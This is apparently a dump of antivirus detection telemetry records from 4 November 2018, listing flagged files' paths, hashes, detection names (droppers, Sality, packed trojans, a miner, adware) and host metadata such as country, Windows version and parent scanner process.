  Row(detection=Row(filename='avscan-20181104-214132-1974e7be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6400e8be\\AVSCAN-20181104-214121-177FA6EB\\AVSCAN-20181104-214132-1974E7BE', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:41:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f741f5311855fc6ed77ce20b8485176c0cc2ada909bc68997e8a2e4bd5cdae43', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F741F5311855FC6ED77CE20B8485176C0CC2ADA909BC68997E8A2E4BD5CDAE43', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f741f5311855fc6ed77ce20b8485176c0cc2ada909bc68997e8a2e4bd5cdae43', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:53:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000c817', filepath='C:\\Windows\\Temp\\20b44ad0-d48c-41e5-8115-9912b5f11a73\\tmp000001cf\\tmp0000c817', filesize=17088000, name='TR/Crypt.XPACK.Gen.#M300.#R2389'), hash='f7db85be546844c768eeed196e3cf2c4b9260953dba1fd983ce1a9785ae99acf', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T13:00:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f7ebe4b5dc142163af430333a96d45443f54059a605e6edd78e600b325e82c5c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F7EBE4B5DC142163AF430333A96D45443F54059A605E6EDD78E600B325E82C5C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f7ebe4b5dc142163af430333a96d45443f54059a605e6edd78e600b325e82c5c', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:55:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gclaw.exe', filepath='D:\\العاب حسين\\Claw\\gCLAW.EXE', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='f82c8ecd9f5b050b902d7d15f483d434b236ef766cfc036febb2fdc28d6de746', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:3okSyQarvEivO1iB.1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-04T14:12:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0006885.exe', filepath='\\\\?\\D:\\System Volume Information\\_restore{380D42AC-7531-4738-9953-A56FA241C116}\\RP1\\A0006885.exe', filesize=512000, name='W32/Sality.Y.#M1.#R1'), hash='f96902071114e0ed5c5581b0607a107c142d6bfd548f0525385eb95b18e02014', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:31:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-085829-862c0870', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085528-6E0DED0D\\AVSCAN-20181104-085829-862C0870', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:58:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291cdd', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291cdd', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:00:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002921e3', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002921e3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:05:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297528', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297528', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:45:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00237dbb', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00237dbb', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:14:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293429', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293429', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:26:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294beb', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294beb', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:47:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b111', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b111', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:10:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a857', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a857', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:00:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002976dc', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002976dc', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:48:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c43d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c43d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:31:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293033', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293033', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:22:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293760', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293760', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:30:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b1a4', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b1a4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:10:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002976f5', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002976f5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:48:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ec16', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ec16', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:06:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239d1e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239d1e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:48:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023cb08', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023cb08', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:38:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029184b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029184b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:54:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b174', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b174', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:10:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297504', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297504', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:45:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b199', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b199', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:10:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294c45', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294c45', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:47:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239cb6', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239cb6', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:48:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0028fe49', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0028fe49', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:23:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239cc4', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239cc4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:48:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023cb98', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023cb98', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:39:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297250', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297250', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:41:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293599', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293599', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:28:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295999', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295999', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:06:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294335', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294335', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:38:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291f62', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291f62', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:02:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002921fe', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002921fe', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:05:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293fb9', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293fb9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:33:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029374f', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029374f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:30:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029747c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029747c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:44:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239c61', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239c61', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:48:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e9ce', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e9ce', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:04:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b0e0', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b0e0', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:10:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291f91', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291f91', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:02:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c164', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c164', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:28:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297405', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297405', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:44:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002937a9', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002937a9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:30:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002925ec', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002925ec', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:10:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002923b7', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002923b7', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:07:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029606f', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029606f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:15:46Z'), dt=datetime.date(2018, 11, 4)),
